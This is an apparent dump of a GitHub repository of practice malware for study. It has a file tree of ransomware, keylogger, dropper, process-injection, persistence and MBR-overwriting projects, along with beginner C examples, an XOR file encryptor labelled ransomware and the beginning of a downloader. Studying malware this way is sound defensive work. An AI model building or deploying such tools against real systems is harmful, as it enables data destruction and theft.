├── LICENSE
├── README.md
├── aes-crypt
├── aes-crypt.sln
├── aes-crypt
│ ├── aes-crypt.cpp
│ ├── aes-crypt.vcxproj
│ ├── aes-crypt.vcxproj.filters
│ └── aes-crypt.vcxproj.user
└── release
│ └── x64
│ ├── aes-crypt.zip
│ ├── secret-dec.txt
│ ├── secret-enc.txt
│ └── secret.txt
├── lma-poc
├── README.md
├── mingw
│ ├── ex00_messagebox.c
│ ├── ex01_print_string.c
│ ├── ex02_local_var.c
│ ├── ex03_global_var.c
│ ├── ex04_conditions.c
│ ├── ex05_x86_and_x64.c
│ ├── ex06_simple_file_handle.c
│ ├── ex07_clear_buffer.c
│ ├── ex08_function_pointer.c
│ ├── ex09_callback_function.c
│ ├── ex10_simple_ransomware.c
│ ├── ex11_simple_downloader.c
│ ├── ex12_simple_dropper.c
│ ├── simple_dll
│ │ ├── main.cpp
│ │ ├── main.h
│ │ ├── simple_dll.cbp
│ │ ├── simple_dll.depend
│ │ └── simple_dll.layout
│ └── xor_file.py
└── msvc
│ ├── Ex01_MessageBox
│ ├── Ex01_MessageBox.c
│ ├── Ex01_MessageBox.vcxproj
│ ├── Ex01_MessageBox.vcxproj.filters
│ └── Ex01_MessageBox.vcxproj.user
│ ├── Ex02_PrintString
│ ├── Ex02_PrintString.vcxproj
│ ├── Ex02_PrintString.vcxproj.filters
│ ├── Ex02_PrintString.vcxproj.user
│ └── Ex02_Print_String.c
│ ├── Ex03_LocalVariable
│ ├── Ex03_LocalVariable.vcxproj
│ ├── Ex03_LocalVariable.vcxproj.filters
│ ├── Ex03_LocalVariable.vcxproj.user
│ └── Ex03_Local_Variable.c
│ ├── Ex04_GlobalVariable
│ ├── Ex04_GlobalVariable.vcxproj
│ ├── Ex04_GlobalVariable.vcxproj.filters
│ ├── Ex04_GlobalVariable.vcxproj.user
│ └── Ex04_Global_Variable.c
│ ├── Ex05_Conditions
│ ├── Ex05_Conditions.c
│ ├── Ex05_Conditions.vcxproj
│ ├── Ex05_Conditions.vcxproj.filters
│ └── Ex05_Conditions.vcxproj.user
│ ├── Ex06_x86_x64_Architecture
│ ├── Ex06_x86_x64_Architecture.c
│ ├── Ex06_x86_x64_Architecture.vcxproj
│ ├── Ex06_x86_x64_Architecture.vcxproj.filters
│ └── Ex06_x86_x64_Architecture.vcxproj.user
│ ├── Ex07_FileHandle
│ ├── Ex07_FileHandle.vcxproj
│ ├── Ex07_FileHandle.vcxproj.filters
│ ├── Ex07_FileHandle.vcxproj.user
│ └── Ex07_File_Handle.c
│ ├── Ex08_BufferClean
│ ├── Ex08_BufferClean.vcxproj
│ ├── Ex08_BufferClean.vcxproj.filters
│ ├── Ex08_BufferClean.vcxproj.user
│ └── Ex08_Buffer_Clean.c
│ ├── Ex09_Function_Pointer
│ ├── Ex09_Function_Pointer.c
│ ├── Ex09_Function_Pointer.vcxproj
│ ├── Ex09_Function_Pointer.vcxproj.filters
│ └── Ex09_Function_Pointer.vcxproj.user
│ ├── Ex10_Callback_Function
│ ├── Ex10_Callback_Function.c
│ ├── Ex10_Callback_Function.vcxproj
│ ├── Ex10_Callback_Function.vcxproj.filters
│ └── Ex10_Callback_Function.vcxproj.user
│ ├── Ex11_Simple_Ransomware
│ ├── Ex11_Simple_Ransomware.c
│ ├── Ex11_Simple_Ransomware.vcxproj
│ ├── Ex11_Simple_Ransomware.vcxproj.filters
│ └── Ex11_Simple_Ransomware.vcxproj.user
│ ├── Ex12_1_Simple_DLL_No_Export
│ ├── Ex12_1_Simple_DLL_No_Export.c
│ ├── Ex12_1_Simple_DLL_No_Export.vcxproj
│ ├── Ex12_1_Simple_DLL_No_Export.vcxproj.filters
│ └── Ex12_1_Simple_DLL_No_Export.vcxproj.user
│ ├── Ex12_2_Simple_DLL_Func_Exported
│ ├── Ex12_2_Simple_DLL_Func_Exported.c
│ ├── Ex12_2_Simple_DLL_Func_Exported.vcxproj
│ ├── Ex12_2_Simple_DLL_Func_Exported.vcxproj.filters
│ └── Ex12_2_Simple_DLL_Func_Exported.vcxproj.user
│ ├── Ex13_Simple_Downloader
│ ├── Ex13_Simple_Downloader.c
│ ├── Ex13_Simple_Downloader.vcxproj
│ ├── Ex13_Simple_Downloader.vcxproj.filters
│ └── Ex13_Simple_Downloader.vcxproj.user
│ ├── Ex14_Simple_Dropper
│ ├── Ex14_Simple_Dropper.c
│ ├── Ex14_Simple_Dropper.rc
│ ├── Ex14_Simple_Dropper.vcxproj
│ ├── Ex14_Simple_Dropper.vcxproj.filters
│ ├── Ex14_Simple_Dropper.vcxproj.user
│ ├── evil.exe
│ ├── fluidicon.png
│ └── resource.h
│ ├── Ex15_Simple_Ransomware_AES128
│ ├── Ex15_Simple_Ransomware_AES128.c
│ ├── Ex15_Simple_Ransomware_AES128.vcxproj
│ ├── Ex15_Simple_Ransomware_AES128.vcxproj.filters
│ └── Ex15_Simple_Ransomware_AES128.vcxproj.user
│ ├── Ex16_Simple_Keylogger1
│ ├── Ex16_Simple_Keylogger1.c
│ ├── Ex16_Simple_Keylogger1.txt
│ ├── Ex16_Simple_Keylogger1.vcxproj
│ ├── Ex16_Simple_Keylogger1.vcxproj.filters
│ └── Ex16_Simple_Keylogger1.vcxproj.user
│ ├── Ex17_Simple_Keylogger2
│ ├── Ex17_Simple_Keylogger2.c
│ ├── Ex17_Simple_Keylogger2.vcxproj
│ ├── Ex17_Simple_Keylogger2.vcxproj.filters
│ └── Ex17_Simple_Keylogger2.vcxproj.user
│ ├── Ex18_1_Persistence_Run_Registry
│ ├── Ex18_1_Persistence_Run_Registry.c
│ ├── Ex18_1_Persistence_Run_Registry.rc
│ ├── Ex18_1_Persistence_Run_Registry.vcxproj
│ ├── Ex18_1_Persistence_Run_Registry.vcxproj.filters
│ ├── Ex18_1_Persistence_Run_Registry.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_2_Persistence_Scheduled_Task
│ ├── Ex18_2_Persistence_Scheduled_Task.c
│ ├── Ex18_2_Persistence_Scheduled_Task.rc
│ ├── Ex18_2_Persistence_Scheduled_Task.vcxproj
│ ├── Ex18_2_Persistence_Scheduled_Task.vcxproj.filters
│ ├── Ex18_2_Persistence_Scheduled_Task.vcxproj.user
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_3_Persistence_Startup_Folder
│ ├── Ex18_3_Persistence_Startup_Folder.c
│ ├── Ex18_3_Persistence_Startup_Folder.rc
│ ├── Ex18_3_Persistence_Startup_Folder.vcxproj
│ ├── Ex18_3_Persistence_Startup_Folder.vcxproj.filters
│ ├── Ex18_3_Persistence_Startup_Folder.vcxproj.user
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_4_Persistence_Winlogon_Registry
│ ├── Ex18_4_Persistence_Winlogon_Registry.c
│ ├── Ex18_4_Persistence_Winlogon_Registry.rc
│ ├── Ex18_4_Persistence_Winlogon_Registry.vcxproj
│ ├── Ex18_4_Persistence_Winlogon_Registry.vcxproj.filters
│ ├── Ex18_4_Persistence_Winlogon_Registry.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── RegBak
│ │ └── Winlogon.reg
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_5_Persistence_IFEO
│ ├── Ex18_5_Persistence_IFEO.c
│ ├── Ex18_5_Persistence_IFEO.rc
│ ├── Ex18_5_Persistence_IFEO.vcxproj
│ ├── Ex18_5_Persistence_IFEO.vcxproj.filters
│ ├── Ex18_5_Persistence_IFEO.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── evil.exe
│ └── resource.h
│ ├── Ex18_6_Persistence_AppInit_DLLs
│ ├── Ex18_6_Persistence_AppInit_DLLs.c
│ ├── Ex18_6_Persistence_AppInit_DLLs.rc
│ ├── Ex18_6_Persistence_AppInit_DLLs.vcxproj
│ ├── Ex18_6_Persistence_AppInit_DLLs.vcxproj.filters
│ ├── Ex18_6_Persistence_AppInit_DLLs.vcxproj.user
│ ├── MyRegistry.c
│ ├── MyRegistry.h
│ ├── evil.dll
│ └── resource.h
│ ├── Ex18_7_Persistence_Windows_Service
│ ├── Evil_WS.exe
│ ├── Ex18_7_Persistence_Windows_Service.c
│ ├── Ex18_7_Persistence_Windows_Service.rc
│ ├── Ex18_7_Persistence_Windows_Service.vcxproj
│ ├── Ex18_7_Persistence_Windows_Service.vcxproj.filters
│ ├── Ex18_7_Persistence_Windows_Service.vcxproj.user
│ └── resource.h
│ ├── Ex19_Simple_Windows_Service
│ ├── Ex19_Simple_Windows_Service.c
│ ├── Ex19_Simple_Windows_Service.vcxproj
│ ├── Ex19_Simple_Windows_Service.vcxproj.filters
│ └── Ex19_Simple_Windows_Service.vcxproj.user
│ └── VS_2017_Proj.sln
├── mbr-overwriting
├── README.md
├── mbr-overwriting.sln
├── mbr-overwriting
│ ├── mbr-overwriting.cpp
│ ├── mbr-overwriting.vcxproj
│ ├── mbr-overwriting.vcxproj.filters
│ └── mbr-overwriting.vcxproj.user
└── release
│ └── x64
│ └── mbr-overwriting.zip
├── process-injection
├── README.md
├── code-cave-injection
│ └── code-cave-injection.cpp
├── hook-injection
│ └── hook-injection.cpp
├── portable-executable-injection
│ └── pe-injection.cpp
├── process-hollowing
│ └── process-hollowing.cpp
├── registry-modification
│ └── registry-modification.cpp
├── remote-dll-injection
│ └── dll-injection.cpp
├── test-lib
│ ├── dllmain.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ └── testLibs.cpp
├── test-messagebox
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ └── testMessageBox.cpp
└── thread-execution-hijacking
│ └── thread-execution-hijacking.cpp
├── simple-dll
├── dll-no-export
│ ├── dll-no-export.vcxproj
│ ├── dll-no-export.vcxproj.filters
│ ├── dll-no-export.vcxproj.user
│ └── dllmain.c
├── dll-with-exported
│ ├── dll-with-exported.vcxproj
│ ├── dll-with-exported.vcxproj.filters
│ ├── dll-with-exported.vcxproj.user
│ └── dllmain.c
├── release
│ └── x64
│ │ ├── dll-no-export.zip
│ │ └── dll-with-exported.zip
└── simple-dll.sln
├── simple-downloader
├── release
│ └── x64
│ │ └── simple-downloader.zip
├── simple-downloader.sln
└── simple-downloader
│ ├── simple-downloader.c
│ ├── simple-downloader.vcxproj
│ ├── simple-downloader.vcxproj.filters
│ └── simple-downloader.vcxproj.user
├── simple-dropper
├── release
│ └── x64
│ │ └── simple-dropper.zip
├── simple-dropper.sln
└── simple-dropper
│ ├── bin
│ ├── evil.exe
│ └── fluidicon.png
│ ├── resource.h
│ ├── simple-dropper.aps
│ ├── simple-dropper.c
│ ├── simple-dropper.rc
│ ├── simple-dropper.vcxproj
│ ├── simple-dropper.vcxproj.filters
│ └── simple-dropper.vcxproj.user
├── simple-encryption
├── release
│ └── x64
│ │ └── simple-encryption.zip
├── simple-encryption.sln
└── simple-encryption
│ ├── simple-encryption.c
│ ├── simple-encryption.vcxproj
│ ├── simple-encryption.vcxproj.filters
│ └── simple-encryption.vcxproj.user
├── simple-keylogger
├── hooking-keylogger
│ ├── hooking-keylogger.c
│ ├── hooking-keylogger.vcxproj
│ ├── hooking-keylogger.vcxproj.filters
│ └── hooking-keylogger.vcxproj.user
├── polling-keylogger
│ ├── polling-keylogger.c
│ ├── polling-keylogger.vcxproj
│ ├── polling-keylogger.vcxproj.filters
│ └── polling-keylogger.vcxproj.user
├── release
│ └── x64
│ │ ├── hooking-keylogger.zip
│ │ └── polling-keylogger.zip
└── simple-keylogger.sln
└── simple-persistence
├── appinit-dlls
├── appinit-dlls.aps
├── appinit-dlls.c
├── appinit-dlls.rc
├── appinit-dlls.vcxproj
├── appinit-dlls.vcxproj.filters
├── appinit-dlls.vcxproj.user
├── bin
│ └── evil.dll
├── reg
│ └── Windows.reg
├── registry.c
├── registry.h
└── resource.h
├── image-file-execution-options
├── bin
│ └── evil.exe
├── image-file-execution-options.aps
├── image-file-execution-options.c
├── image-file-execution-options.rc
├── image-file-execution-options.vcxproj
├── image-file-execution-options.vcxproj.filters
├── image-file-execution-options.vcxproj.user
├── registry.c
├── registry.h
└── resource.h
├── release
└── x64
│ ├── appinit-dlls.zip
│ ├── image-file-execution-options.zip
│ ├── run-registry.zip
│ ├── scheduled-task.zip
│ ├── startup-folder.zip
│ ├── windows-service.zip
│ └── winlogon-registry.zip
├── run-registry
├── bin
│ └── evil.exe
├── registry.c
├── registry.h
├── resource.h
├── run-registry.aps
├── run-registry.c
├── run-registry.rc
├── run-registry.vcxproj
├── run-registry.vcxproj.filters
└── run-registry.vcxproj.user
├── scheduled-task
├── bin
│ └── evil.exe
├── resource.h
├── scheduled-task.aps
├── scheduled-task.c
├── scheduled-task.rc
├── scheduled-task.vcxproj
├── scheduled-task.vcxproj.filters
└── scheduled-task.vcxproj.user
├── simple-persistence.sln
├── startup-folder
├── bin
│ └── evil.exe
├── resource.h
├── startup-folder.aps
├── startup-folder.c
├── startup-folder.rc
├── startup-folder.vcxproj
├── startup-folder.vcxproj.filters
└── startup-folder.vcxproj.user
├── windows-service
├── bin
│ └── evil-service.exe
├── resource.h
├── windows-service.aps
├── windows-service.c
├── windows-service.rc
├── windows-service.vcxproj
├── windows-service.vcxproj.filters
└── windows-service.vcxproj.user
└── winlogon-registry
├── bin
└── evil.exe
├── reg
└── Winlogon.reg
├── registry.c
├── registry.h
├── resource.h
├── winlogon-registry.aps
├── winlogon-registry.c
├── winlogon-registry.rc
├── winlogon-registry.vcxproj
├── winlogon-registry.vcxproj.filters
└── winlogon-registry.vcxproj.user
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 Hai Le Hong
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Disclaimer
2 |
3 | The purpose of this repository is to allow the study of malware. I am not responsible for any damage caused by the malware inside my repository and your negligence in general. Use it only against systems that you are permitted to attack.
4 |
5 |
6 | ## Common Malware Techniques
7 | - Downloader
8 | - Dropper
9 | - Process Injection
10 | - Code cave injection
11 | - Hook injection
12 | - Portable executable injection
13 | - Process hollowing
14 | - Registry modification
15 | - Remote dll injection
16 | - Thread execution hijacking
17 | - Encryption:
18 | - AES
19 | - XOR
20 | - Keylogger:
21 | - Polling keylogger
22 | - Hooking keylogger
23 | - Persistence Mechanisms:
24 | - AppInit dlls
25 | - Image file execution options
26 | - Registry run keys
27 | - Scheduled tasks
28 | - Startup folder
29 | - Windows service
30 | - Winlogon helper dll
31 | - Others:
32 | - MBR overwriting
33 |
--------------------------------------------------------------------------------
/aes-crypt/aes-crypt.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aes-crypt", "aes-crypt\aes-crypt.vcxproj", "{3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Debug|x64.ActiveCfg = Debug|x64
17 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Debug|x86.ActiveCfg = Debug|Win32
18 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x64.ActiveCfg = Release|x64
19 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x64.Build.0 = Release|x64
20 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x86.ActiveCfg = Release|Win32
21 | {3A6DBFB9-6CDD-4C0E-9780-F33C62CEB1E0}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {577D5C1D-DADF-4047-A7CC-D5F76DF10BB1}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/aes-crypt/aes-crypt/aes-crypt.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/aes-crypt/aes-crypt/aes-crypt.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/aes-crypt/release/x64/aes-crypt.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/aes-crypt/release/x64/aes-crypt.zip
--------------------------------------------------------------------------------
/aes-crypt/release/x64/secret-dec.txt:
--------------------------------------------------------------------------------
1 | Lorem Ipsum is simply dummy text of the printing and typesetting industry.
2 | Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.
3 | It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.
4 | It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
--------------------------------------------------------------------------------
/aes-crypt/release/x64/secret-enc.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/aes-crypt/release/x64/secret-enc.txt
--------------------------------------------------------------------------------
/aes-crypt/release/x64/secret.txt:
--------------------------------------------------------------------------------
1 | Lorem Ipsum is simply dummy text of the printing and typesetting industry.
2 | Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.
3 | It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.
4 | It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
--------------------------------------------------------------------------------
/lma-poc/README.md:
--------------------------------------------------------------------------------
1 | ## Learning Malware Analysis
2 |
--------------------------------------------------------------------------------
/lma-poc/mingw/ex00_messagebox.c:
--------------------------------------------------------------------------------
1 | #include
2 | // For hide console windows: -mwindows
3 | // $ gcc.exe .\ex00_messagebox.c -mwindows -o .\bin\ex00_messagebox
4 | int main() {
5 | MessageBoxA(NULL, "Hello, World!", "Hi!", MB_OK | MB_ICONINFORMATION);
6 | return 0;
7 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex01_print_string.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main() {
5 | char *str = "Lorem Ipsum is simply dummy text.";
6 | printf("%s", str);
7 | return 0;
8 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex02_local_var.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | int x = 1;
7 | int y;
8 | y = x;
9 | return 0;
10 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex03_global_var.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int a;
5 | char b;
6 |
7 | int main()
8 | {
9 | a = 41;
10 | b = 'A';
11 | int x = a;
12 | int *y = &a;
13 | char *string = "test";
14 | return 0;
15 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex04_conditions.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | int x = 0;
7 | if (x == 0)
8 | {
9 | x = 5;
10 | }
11 | x = 2;
12 | return 0;
13 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex05_x86_and_x64.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | printf("%d %s %d %s %d %s %s %s", 1, "Two", 3, "FOUR", 555, "sIx!", "777", "eiGht-888");
7 | return 0;
8 | }
9 |
--------------------------------------------------------------------------------
/lma-poc/mingw/ex06_simple_file_handle.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main()
6 | {
7 | TCHAR filePath[MAX_PATH];
8 |
9 | // Current working directory
10 | GetCurrentDirectoryA(MAX_PATH, filePath);
11 |
12 | // Format path to save file
13 | wsprintfA(filePath, TEXT("%s\\simple_file_handle.txt"), filePath);
14 |
15 | printf(" [+] Win32 API Example: CreateFile, WriteFile.\n");
16 | HANDLE hFile = CreateFileA(filePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
17 |
18 | if (hFile == INVALID_HANDLE_VALUE) {
19 | printf(" [-] Invalid handle file.\n"); exit(2);
20 | }
21 |
22 | char buffer[] = "Lorem Ipsum is simply dummy text of the printing and typesetting industry.";
23 | DWORD bytesWritten;
24 | int buffer_size = strlen(buffer);
25 | WriteFile(hFile, buffer, buffer_size, &bytesWritten, NULL);
26 | CloseHandle(hFile);
27 |
28 | return 0;
29 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex07_clear_buffer.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main()
5 | {
6 | char name[25], country[20];
7 | int age, c;
8 |
9 | printf("Name = ");
10 | gets(name);
11 |
12 | printf("Age = ");
13 | scanf("%d", &age);
14 |
15 | while ((c = getchar()) != '\n' && c != EOF) {}
16 |
17 | printf("Country = ");
18 | gets(country);
19 |
20 | printf("Name: %s, Country: %s, Age: %d\n", name, country, age);
21 |
22 | return 0;
23 | }
24 |
--------------------------------------------------------------------------------
/lma-poc/mingw/ex08_function_pointer.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int Add(int a, int b) {
5 | return a+b;
6 | }
7 |
8 | int Mul(int a, int b) {
9 | return a*b;
10 | }
11 |
12 | int main()
13 | {
14 | typedef int(*ptrFunc)(int, int);
15 |
16 | printf("[ + ] Initialize local variable and function pointer!\n");
17 | ptrFunc ptrAdd = NULL, ptrMul = NULL;
18 | int x = 0, y = 0;
19 |
20 | printf("[ + ] Assigned Ptr.\n");
21 | ptrAdd = &Add;
22 | ptrMul = &Mul;
23 |
24 | printf("[ + ] Please input numer:\n");
25 | printf("number x = ");
26 | scanf("%d", &x);
27 | printf("number y = ");
28 | scanf("%d", &y);
29 |
30 | printf("%d + %d = %d\n", x, y, ptrAdd(x, y));
31 | printf("%d * %d = %d\n", x, y, ptrMul(x, y));
32 |
33 | return 0;
34 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex09_callback_function.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int Add(int a, int b) {
5 | return a+b;
6 | }
7 |
8 | int Mul(int a, int b) {
9 | return a*b;
10 | }
11 |
12 | typedef int(*Calculator)(int, int);
13 |
14 | int superCalculator(int a, int b, Calculator ptrCalFunc) {
15 | return ptrCalFunc(a, b);
16 | }
17 |
18 | int main()
19 | {
20 | printf("[ + ] Local variable Initialized.\n");
21 | int x = 0, y = 0;
22 |
23 | printf("[ + ] Please input numer:\n");
24 | printf("number x = ");
25 | scanf("%d", &x);
26 | printf("number y = ");
27 | scanf("%d", &y);
28 |
29 | printf("%d + %d = %d\n", x, y, superCalculator(x, y, Add));
30 | printf("%d * %d = %d\n", x, y, superCalculator(x, y, Mul));
31 |
32 | return 0;
33 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex10_simple_ransomware.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | /*
6 | ** Name : SFET - Simple File Encryption Tool
7 | ** Version : v0.1 - Beta version
8 | ** Crypto Algorithm support: XOR (AES, RSA, Hashing,.v.v.. is comming)
9 | ** Compiler : MinGW/Gcc v8.1, Linux Gcc v9.3
10 | */
11 |
12 | void printf_usage(char *str)
13 | {
14 | printf(" [+] Usage: %s \n", str);
15 | }
16 |
17 | int isValidXorKey(const char *key)
18 | {
19 | // xor key must be a numberic
20 | int len = strlen(key);
21 | for (int i = 0; i < len; i++)
22 | if (key[i] < '0' || key[i] > '9')
23 | return 0;
24 | return 1;
25 | }
26 |
27 | unsigned long long getSizeOfFile(char *filename)
28 | {
29 | FILE *fptr = NULL;
30 | unsigned long long sizeOfFile = 0;
31 | if ((fptr = fopen(filename, "rb")) == NULL) {
32 | printf(" [-] Error! Opening file \'%s\' for calculating size.\n", filename); exit(2);
33 | }
34 |
35 | fseek(fptr, 0L, SEEK_END);
36 | sizeOfFile = ftell(fptr);
37 | fclose(fptr);
38 | return sizeOfFile;
39 | }
40 |
41 | void readFileBinary(char *buffer, char *filename, unsigned long long filesize)
42 | {
43 | FILE *fptr = NULL;
44 | unsigned long long numberOfBytes = 0;
45 |
46 | if ((fptr = fopen(filename, "rb")) == NULL) {
47 | printf(" [-] Error! Opening file \'%s\' for reading.\n", filename); exit(2);
48 | }
49 |
50 | numberOfBytes = fread(buffer, 1, filesize, fptr);
51 | if (numberOfBytes != filesize) {
52 | printf(" [-] Error! Reading file\n"); exit(3);
53 | }
54 |
55 | fclose(fptr);
56 | }
57 |
58 | void writeFileBinary(char *buffer, char *filename, unsigned long long filesize)
59 | {
60 | FILE *fptr = NULL;
61 | unsigned long long numberOfBytes = 0;
62 |
63 | if ((fptr = fopen(filename, "wb")) == NULL) {
64 | printf(" [-] Error! Opening file \'%s\' for writing.\n", filename); exit(2);
65 | }
66 |
67 | numberOfBytes = fwrite(buffer , 1, filesize, fptr);
68 | if (numberOfBytes != filesize) {
69 | printf(" [-] Error! Writing file\n"); exit(4);
70 | }
71 |
72 | fclose(fptr);
73 | }
74 |
75 | void bufferEncoding(char *buffer, int xorKey, unsigned long long filesize)
76 | {
77 | unsigned long long i;
78 | for (i = 0; i < filesize; i++)
79 | buffer[i] ^= xorKey;
80 | }
81 |
82 | int main(int argc, char const *argv[])
83 | {
84 | // Get program name
85 | char progName[50];
86 | char *lastToken = strrchr(argv[0], '\\');
87 |
88 | if (lastToken != NULL) strcpy(progName, lastToken + 1);
89 | else strcpy(progName, argv[0]);
90 |
91 | // Check arguments
92 | if (argc != 4) {
93 | printf_usage(progName); exit(5);
94 | }
95 |
96 | char fileIn[50], fileOut[50];
97 | int xorKey = 0;
98 |
99 | // Parsing arguments
100 | strcpy(fileIn, argv[1]);
101 | if (isValidXorKey(argv[2])) {
102 | xorKey = atoi(argv[2]);
103 | } else {
104 | printf(" [-] Error! Invalid key. The encrypt key must be numberic!\n"); exit(5);
105 | }
106 | strcpy(fileOut, argv[3]);
107 |
108 | char *buffer = NULL;
109 | unsigned long long sizeOfFile = 0;
110 |
111 | // Obtain file size
112 | sizeOfFile = getSizeOfFile(fileIn);
113 |
114 | // Allocate memory to contain the whole file
115 | buffer = (char *)malloc(sizeOfFile * sizeof(char));
116 | if (buffer == NULL) {
117 | printf(" [-] Error! Memory not allocated.\n"); exit(3);
118 | }
119 |
120 | // Reading file to buffer
121 | readFileBinary(buffer, fileIn, sizeOfFile);
122 |
123 | // Encoding payload
124 | bufferEncoding(buffer, xorKey, sizeOfFile);
125 |
126 | // Write buffer to new file
127 | writeFileBinary(buffer, fileOut, sizeOfFile);
128 |
129 | // Terminate
130 | free(buffer);
131 |
132 | return 0;
133 | }
--------------------------------------------------------------------------------
/lma-poc/mingw/ex11_simple_downloader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "urlmon.lib")
6 |
7 | /*
8 | ** Ref 1: https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/ms775123(v=vs.85)
9 | ** Ref 2: https://stackoverflow.com/a/5185008
10 | */
11 |
12 | int main()
13 | {
14 | TCHAR url[] = TEXT("https://github.com/fluidicon.png");
15 | TCHAR filePath[MAX_PATH];
16 |
17 | // Current working directory
